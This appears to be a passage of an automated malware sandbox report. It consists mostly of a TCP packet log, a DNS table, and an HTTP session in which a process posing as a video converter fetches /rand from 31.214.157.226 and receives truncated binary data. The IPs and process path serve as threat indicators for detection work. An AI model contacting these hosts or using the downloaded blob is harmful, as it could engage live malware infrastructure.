                                                                                                    Dec 16, 2024 13:44:18.453710079 CET44349935188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:18.453768015 CET49935443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:18.453826904 CET49935443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:18.454103947 CET49935443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:18.454139948 CET44349935188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:18.574441910 CET49943443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:18.574472904 CET44349943188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:18.574707985 CET49943443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:18.575026035 CET49943443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:18.575043917 CET44349943188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:20.219840050 CET44349943188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:20.219994068 CET49943443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:20.220396996 CET49943443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:20.220407009 CET44349943188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:20.220653057 CET49943443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:20.220658064 CET44349943188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:20.899564028 CET44349943188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:20.899723053 CET44349943188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:20.899734974 CET49943443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:20.899770021 CET49943443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:20.899946928 CET49943443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:20.899970055 CET44349943188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:21.011082888 CET49949443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:21.011152983 CET44349949188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:21.011262894 CET49949443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:21.011653900 CET49949443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:21.011672020 CET44349949188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:22.653095961 CET44349949188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:22.653228998 CET49949443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:22.653645992 CET49949443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:22.653656006 CET44349949188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:22.655670881 CET49949443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:22.655678034 CET44349949188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:23.340699911 CET44349949188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:23.340763092 CET44349949188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:23.340770006 CET49949443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:23.340826035 CET49949443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:23.341733932 CET49949443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:23.341753960 CET44349949188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:23.463959932 CET49955443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:23.464004993 CET44349955188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:23.464092016 CET49955443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:23.464360952 CET49955443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:23.464381933 CET44349955188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:24.938968897 CET44349955188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:24.939052105 CET49955443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:24.964634895 CET49955443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:24.964654922 CET44349955188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:24.964728117 CET49955443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:24.964735031 CET44349955188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:25.619296074 CET44349955188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:25.619369030 CET49955443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:25.619401932 CET44349955188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:25.619451046 CET49955443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:25.619545937 CET44349955188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:25.619611979 CET49955443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:25.619611979 CET49955443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:25.730233908 CET49961443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:25.730293036 CET44349961188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:25.730451107 CET49961443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:25.730957031 CET49961443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:25.730978966 CET44349961188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:25.930294037 CET49955443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:25.930335999 CET44349955188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:27.376801968 CET44349961188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:27.376908064 CET49961443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:27.377644062 CET49961443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:27.377667904 CET44349961188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:27.377914906 CET49961443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:27.377928019 CET44349961188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:28.064423084 CET44349961188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:28.064529896 CET44349961188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:28.064570904 CET49961443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:28.064647913 CET49961443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:28.065232992 CET49961443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:28.065259933 CET44349961188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:28.183657885 CET49967443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:28.183713913 CET44349967188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:28.183789968 CET49967443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:28.184076071 CET49967443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:28.184089899 CET44349967188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:29.829181910 CET44349967188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:29.829324961 CET49967443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:29.830070972 CET49967443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:29.830089092 CET44349967188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:29.830245018 CET49967443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:29.830249071 CET44349967188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:30.519551992 CET44349967188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:30.519619942 CET49967443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:30.519632101 CET44349967188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:30.519679070 CET49967443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:30.519886017 CET49967443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:30.519906998 CET44349967188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:30.637319088 CET49973443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:30.637366056 CET44349973188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:30.637428999 CET49973443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:30.637671947 CET49973443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:30.637686014 CET44349973188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:32.107017040 CET44349973188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:32.109910965 CET49973443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:32.110282898 CET49973443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:32.110290051 CET44349973188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:32.110457897 CET49973443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:32.110462904 CET44349973188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:32.789438009 CET44349973188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:32.789491892 CET49973443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:32.789504051 CET44349973188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:32.789515972 CET44349973188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:32.789546013 CET49973443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:32.789565086 CET49973443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:32.790324926 CET49973443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:32.790340900 CET44349973188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:32.901848078 CET49979443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:32.901891947 CET44349979188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:32.901962996 CET49979443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:32.902192116 CET49979443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:32.902198076 CET44349979188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:34.350447893 CET44349979188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:34.350581884 CET49979443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:34.351030111 CET49979443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:34.351039886 CET44349979188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:34.351223946 CET49979443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:34.351241112 CET44349979188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:35.035612106 CET44349979188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:35.035672903 CET44349979188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:35.035677910 CET49979443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:35.035727024 CET49979443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:35.035887957 CET49979443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:35.035907030 CET44349979188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:35.155172110 CET49985443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:35.155204058 CET44349985188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:35.155301094 CET49985443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:35.155746937 CET49985443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:35.155769110 CET44349985188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:36.808391094 CET44349985188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:36.808542013 CET49985443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:36.808938980 CET49985443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:36.808955908 CET44349985188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:36.809153080 CET49985443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:36.809164047 CET44349985188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:37.183551073 CET20244984331.214.157.206192.168.2.9
                                                                                                    Dec 16, 2024 13:44:37.185309887 CET4999180192.168.2.931.214.157.226
                                                                                                    Dec 16, 2024 13:44:37.226978064 CET498432024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:44:37.305299997 CET804999131.214.157.226192.168.2.9
                                                                                                    Dec 16, 2024 13:44:37.305398941 CET4999180192.168.2.931.214.157.226
                                                                                                    Dec 16, 2024 13:44:37.305725098 CET499922024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:44:37.425816059 CET20244999231.214.157.206192.168.2.9
                                                                                                    Dec 16, 2024 13:44:37.425929070 CET499922024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:44:37.425995111 CET499922024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:44:37.521224976 CET44349985188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:37.521306992 CET44349985188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:37.521307945 CET49985443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:37.521390915 CET49985443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:37.521646023 CET49985443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:37.521660089 CET44349985188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:37.546401024 CET20244999231.214.157.206192.168.2.9
                                                                                                    Dec 16, 2024 13:44:37.546530008 CET499922024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:44:37.635828018 CET49994443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:37.635883093 CET44349994188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:37.636029005 CET49994443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:37.636236906 CET49994443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:37.636255980 CET44349994188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:37.667071104 CET20244999231.214.157.206192.168.2.9
                                                                                                    Dec 16, 2024 13:44:38.670362949 CET20244999231.214.157.206192.168.2.9
                                                                                                    Dec 16, 2024 13:44:38.670474052 CET4999180192.168.2.931.214.157.226
                                                                                                    Dec 16, 2024 13:44:38.711379051 CET499922024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:44:38.790433884 CET804999131.214.157.226192.168.2.9
                                                                                                    Dec 16, 2024 13:44:39.062680006 CET804999131.214.157.226192.168.2.9
                                                                                                    Dec 16, 2024 13:44:39.062845945 CET499922024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:44:39.100356102 CET44349994188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:39.100474119 CET49994443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:39.118372917 CET4999180192.168.2.931.214.157.226
                                                                                                    Dec 16, 2024 13:44:39.153635025 CET49994443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:39.153665066 CET44349994188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:39.153795004 CET49994443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:39.153801918 CET44349994188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:39.182830095 CET20244999231.214.157.206192.168.2.9
                                                                                                    Dec 16, 2024 13:44:39.456437111 CET20244999231.214.157.206192.168.2.9
                                                                                                    Dec 16, 2024 13:44:39.456501007 CET499922024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:44:39.456567049 CET499922024192.168.2.931.214.157.206
                                                                                                    Dec 16, 2024 13:44:39.456597090 CET4999180192.168.2.931.214.157.226
                                                                                                    Dec 16, 2024 13:44:39.576782942 CET20244999231.214.157.206192.168.2.9
                                                                                                    Dec 16, 2024 13:44:39.577256918 CET804999131.214.157.226192.168.2.9
                                                                                                    Dec 16, 2024 13:44:39.577414989 CET4999180192.168.2.931.214.157.226
                                                                                                    Dec 16, 2024 13:44:39.786972046 CET44349994188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:39.787058115 CET49994443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:39.787075996 CET44349994188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:39.787131071 CET49994443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:39.787328005 CET49994443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:39.787343979 CET44349994188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:39.901293993 CET50000443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:39.901370049 CET44350000188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:39.901458979 CET50000443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:39.901743889 CET50000443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:39.901773930 CET44350000188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:41.353863955 CET44350000188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:41.353931904 CET50000443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:41.355142117 CET50000443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:41.355156898 CET44350000188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:41.355472088 CET50000443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:41.355479002 CET44350000188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:42.040059090 CET44350000188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:42.040136099 CET44350000188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:42.040256977 CET50000443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:42.040256977 CET50000443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:42.057773113 CET50000443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:42.057830095 CET44350000188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:42.198407888 CET50002443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:42.198468924 CET44350002188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:42.198563099 CET50002443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:42.198779106 CET50002443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:42.198796988 CET44350002188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:43.662384987 CET44350002188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:43.662473917 CET50002443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:43.662930012 CET50002443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:43.662940979 CET44350002188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:43.665168047 CET50002443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:43.665180922 CET44350002188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:44.345310926 CET44350002188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:44.345415115 CET50002443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:44.345443010 CET44350002188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:44.345488071 CET44350002188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:44.345550060 CET50002443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:44.348609924 CET50002443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:44.348628998 CET44350002188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:44.475023985 CET50003443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:44.475069046 CET44350003188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:44.475143909 CET50003443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:44.475425005 CET50003443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:44.475435019 CET44350003188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:46.115912914 CET44350003188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:46.116003990 CET50003443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:46.116755009 CET50003443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:46.116763115 CET44350003188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:46.119194031 CET50003443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:46.119199991 CET44350003188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:46.802892923 CET44350003188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:46.803006887 CET44350003188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:46.803041935 CET50003443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:46.803212881 CET50003443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:46.803338051 CET50003443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:46.803356886 CET44350003188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:46.936790943 CET50004443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:46.936839104 CET44350004188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:46.936964035 CET50004443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:46.937262058 CET50004443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:46.937278032 CET44350004188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:48.399137020 CET44350004188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:48.405797005 CET50004443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:48.502275944 CET50004443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:48.502294064 CET44350004188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:48.510812044 CET50004443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:48.510822058 CET44350004188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:49.097865105 CET44350004188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:49.098057032 CET44350004188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:49.098162889 CET50004443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:49.099323034 CET50004443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:49.099339008 CET44350004188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:49.247836113 CET50005443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:49.247886896 CET44350005188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:49.248028040 CET50005443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:49.248197079 CET50005443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:49.248212099 CET44350005188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:50.704742908 CET44350005188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:50.705287933 CET50005443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:50.705840111 CET50005443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:50.705851078 CET44350005188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:50.708163977 CET50005443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:50.708169937 CET44350005188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:51.413052082 CET44350005188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:51.413142920 CET44350005188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:51.413172007 CET50005443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:51.413197041 CET50005443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:51.413404942 CET50005443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:51.413427114 CET44350005188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:51.532763958 CET50006443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:51.532819986 CET44350006188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:51.532893896 CET50006443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:51.533390999 CET50006443192.168.2.9188.119.66.185
                                                                                                    Dec 16, 2024 13:44:51.533406019 CET44350006188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:53.179347038 CET44350006188.119.66.185192.168.2.9
                                                                                                    Dec 16, 2024 13:44:53.179425955 CET50006443192.168.2.9188.119.66.185
                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Dec 16, 2024 13:42:41.373579979 CET1.1.1.1192.168.2.90x2249No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                    Dec 16, 2024 13:42:41.373579979 CET1.1.1.1192.168.2.90x2249No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                    • 188.119.66.185
                                                                                                    • 31.214.157.226
                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.94999231.214.157.20620247880C:\Users\user\AppData\Local\Video Converter Factory Free 1.6.4\videoconverterfactory.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Dec 16, 2024 13:44:38.670362949 CET57INGET /rand HTTP/1.1
                                                                                                    Host: 31.214.157.226
                                                                                                    Accept: */*
                                                                                                    Dec 16, 2024 13:44:39.062845945 CET765OUTHTTP/1.1 200 OK
                                                                                                    Server: nginx/1.27.0
                                                                                                    Date: Mon, 16 Dec 2024 12:44:38 GMT
                                                                                                    Content-Type: application/octet-stream
                                                                                                    Content-Length: 512
                                                                                                    Last-Modified: Fri, 02 Aug 2024 10:35:15 GMT
                                                                                                    Connection: keep-alive
                                                                                                    ETag: "66acb663-200"
                                                                                                    Accept-Ranges: bytes
                                                                                                    Data Raw: f1 d9 4a c0 19 06 38 38 48 c8 13 c0 87 51 f2 f6 75 36 43 c2 e3 fa 93 12 84 52 27 0c 74 f3 3f 7b e6 68 bd 72 0f b9 ba f4 04 75 87 9a 2e 05 41 d3 9c 5b e6 06 f0 00 03 b1 2c 26 44 dc 44 f5 b3 c0 dd 7e d5 70 91 45 b4 d6 f4 b4 71 5a 81 01 c7 f2 0a 08 3c ac 68 a3 22 3d 5d 0c a5 e0 12 93 b0 14 47 cd 04 b4 76 ea e3 95 b5 54 68 dd 23 61 5a 4a 1a 76 2e b2 56 cb f2 36 d1 05 a7 20 b4 f0 3b 4b e0 24 d1 25 17 bd 14 c9 dd 2a 87 bf 43 72 20 1f d3 ce da e1 e1 b2 f8 99 41 20 3f 24 3d 5c fa b4 56 58 ca 18 c4 62 e3 9c 08 42 cc d3 ad f6 8d e1 cb a3 85 0b 7a c6 65 20 20 35 19 3f d2 15 39 19 f8 97 c4 b0 97 85 bd b6 ab c3 e4 1c 42 d5 c9 29 2f 06 c0 02 25 f6 36 47 8e a1 8b 2b ad 23 57 4a 60 ca 77 d1 2d d7 21 77 3f 19 61 8e 6f 9d 25 b8 df 3f 0f b6 fb 20 82 d5 b8 c6 d2 09 7b 71 96 bc 5c 77 99 99 0f 85 fd 3e 87 8e 65 91 93 85 3c 55 36 bb 60 63 68 83 b4 73 2c 24 5e 42 fa 80 67 a0 3d a9 ae de 9d 83 e1 db 0d 30 a4 34 3e 72 0f 57 7c 02 1c 80 19 27 73 20 af c1 56 32 02 11 e6 97 33 12 65 cf 2a e4 58 c4 30 f1 3b 08 fa f5 37 62 1a d0 [TRUNCATED]
